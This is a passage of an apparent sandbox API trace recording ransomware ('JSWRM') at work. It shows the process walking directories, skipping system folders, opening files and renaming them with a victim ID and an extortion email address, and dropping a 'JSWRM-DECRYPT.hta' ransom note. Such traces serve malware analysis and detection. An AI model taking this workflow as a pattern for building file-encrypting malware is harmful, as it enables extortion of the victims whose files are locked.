ftLastAccessTime.dwLowDateTime=0xa08c820e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f994ac1, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.686] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.686] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.686] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f994ac1, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f994ac1, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f994ac1, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.686] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.686] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.686] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.686] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.686] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.686] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.686] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.686] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.686] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.686] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0068.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0068.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0068.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.687] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3af7a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3af7a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3af7a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0068.687] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0068.687] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0068.687] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0068.687] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0068.687] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0068.687] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0068.687] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0068.687] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0068.687] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0068.687] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0068.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0068.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0068.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0068.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0068.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0068.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0068.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0068.687] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.687] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10081696995333424) returned 0 [0068.687] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.688] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.688] CloseHandle (hObject=0xffffffff) returned 1 [0068.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0068.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0068.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0068.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0068.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0068.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0068.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.688] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0068.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0068.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0068.688] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3af7a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3af7a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3af7a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0068.688] FindClose (in: hFindFile=0x232000 | out: hFindFile=0x232000) returned 1 [0068.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0068.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0068.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0068.688] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d14d081, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe467a929, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe467a929, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="TabIpsps.dll", cAlternateFileName="")) returned 1 [0068.689] lstrcmpiW (lpString1="TabIpsps.dll", lpString2=".") returned 1 [0068.689] lstrcmpiW (lpString1="TabIpsps.dll", lpString2="..") returned 1 [0068.689] lstrcmpiW (lpString1="TabIpsps.dll", lpString2="...") returned 1 [0068.689] lstrcmpiW (lpString1="TabIpsps.dll", lpString2="windows") returned -1 [0068.689] lstrcmpiW (lpString1="TabIpsps.dll", lpString2="recovery") returned 1 [0068.689] lstrcmpiW (lpString1="TabIpsps.dll", lpString2="perflogs") returned 1 [0068.689] lstrcmpiW (lpString1="TabIpsps.dll", lpString2="documents and settings") returned 1 [0068.689] lstrcmpiW (lpString1="TabIpsps.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.689] lstrcmpiW (lpString1="TabIpsps.dll", lpString2="system volume information") returned 1 [0068.689] lstrcmpiW (lpString1="TabIpsps.dll", lpString2="msocache") returned 1 [0068.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0068.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TabIpsps.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TabIpsps.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TabIpsps.dll", lpUsedDefaultChar=0x0) returned 12 [0068.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0068.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0068.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TabIpsps.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TabIpsps.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TabIpsps.dll", lpUsedDefaultChar=0x0) returned 12 [0068.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0068.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.689] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x463d4edd, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0x779da8e5, ftLastAccessTime.dwHighDateTime=0x1d2fa0a, ftLastWriteTime.dwLowDateTime=0x463d4edd, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x3e9600, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="tabskb.dll", cAlternateFileName="")) returned 1 [0068.689] lstrcmpiW (lpString1="tabskb.dll", lpString2=".") returned 1 [0068.689] lstrcmpiW (lpString1="tabskb.dll", lpString2="..") returned 1 [0068.689] lstrcmpiW (lpString1="tabskb.dll", lpString2="...") returned 1 [0068.689] lstrcmpiW (lpString1="tabskb.dll", lpString2="windows") returned -1 [0068.689] lstrcmpiW (lpString1="tabskb.dll", lpString2="recovery") returned 1 [0068.689] lstrcmpiW (lpString1="tabskb.dll", lpString2="perflogs") returned 1 [0068.689] lstrcmpiW (lpString1="tabskb.dll", lpString2="documents and settings") returned 1 [0068.689] lstrcmpiW (lpString1="tabskb.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.689] lstrcmpiW (lpString1="tabskb.dll", lpString2="system volume information") returned 1 [0068.689] lstrcmpiW (lpString1="tabskb.dll", lpString2="msocache") returned 1 [0068.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0068.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tabskb.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tabskb.dll", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tabskb.dll", lpUsedDefaultChar=0x0) returned 10 [0068.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0068.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tabskb.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tabskb.dll", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tabskb.dll", lpUsedDefaultChar=0x0) returned 10 [0068.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.690] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1a8750a, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1a8750a, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x5f780, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="TabTip.exe", cAlternateFileName="")) returned 1 [0068.690] lstrcmpiW (lpString1="TabTip.exe", lpString2=".") returned 1 [0068.690] lstrcmpiW (lpString1="TabTip.exe", lpString2="..") returned 1 [0068.690] lstrcmpiW (lpString1="TabTip.exe", lpString2="...") returned 1 [0068.690] lstrcmpiW (lpString1="TabTip.exe", lpString2="windows") returned -1 [0068.690] lstrcmpiW (lpString1="TabTip.exe", lpString2="recovery") returned 1 [0068.690] lstrcmpiW (lpString1="TabTip.exe", lpString2="perflogs") returned 1 [0068.690] lstrcmpiW (lpString1="TabTip.exe", lpString2="documents and settings") returned 1 [0068.690] lstrcmpiW (lpString1="TabTip.exe", lpString2="$RECYCLE.BIN") returned 1 [0068.690] lstrcmpiW (lpString1="TabTip.exe", lpString2="system volume information") returned 1 [0068.690] lstrcmpiW (lpString1="TabTip.exe", lpString2="msocache") returned 1 [0068.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0068.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TabTip.exe", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TabTip.exe", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TabTip.exe", lpUsedDefaultChar=0x0) returned 10 [0068.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0068.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0068.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TabTip.exe", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TabTip.exe", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TabTip.exe", lpUsedDefaultChar=0x0) returned 10 [0068.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0068.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0068.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.690] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c8602, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="th-TH", cAlternateFileName="")) returned 1 [0068.690] lstrcmpiW (lpString1="th-TH", lpString2=".") returned 1 [0068.690] lstrcmpiW (lpString1="th-TH", lpString2="..") returned 1 [0068.690] lstrcmpiW (lpString1="th-TH", lpString2="...") returned 1 [0068.691] lstrcmpiW (lpString1="th-TH", lpString2="windows") returned -1 [0068.691] lstrcmpiW (lpString1="th-TH", lpString2="recovery") returned 1 [0068.691] lstrcmpiW (lpString1="th-TH", lpString2="perflogs") returned 1 [0068.691] lstrcmpiW (lpString1="th-TH", lpString2="documents and settings") returned 1 [0068.691] lstrcmpiW (lpString1="th-TH", lpString2="$RECYCLE.BIN") returned 1 [0068.691] lstrcmpiW (lpString1="th-TH", lpString2="system volume information") returned 1 [0068.691] lstrcmpiW (lpString1="th-TH", lpString2="msocache") returned 1 [0068.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0068.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0068.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0068.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.691] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\jswrm-decrypt.hta")) returned 0xffffffff [0068.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0068.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0068.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.691] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.692] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 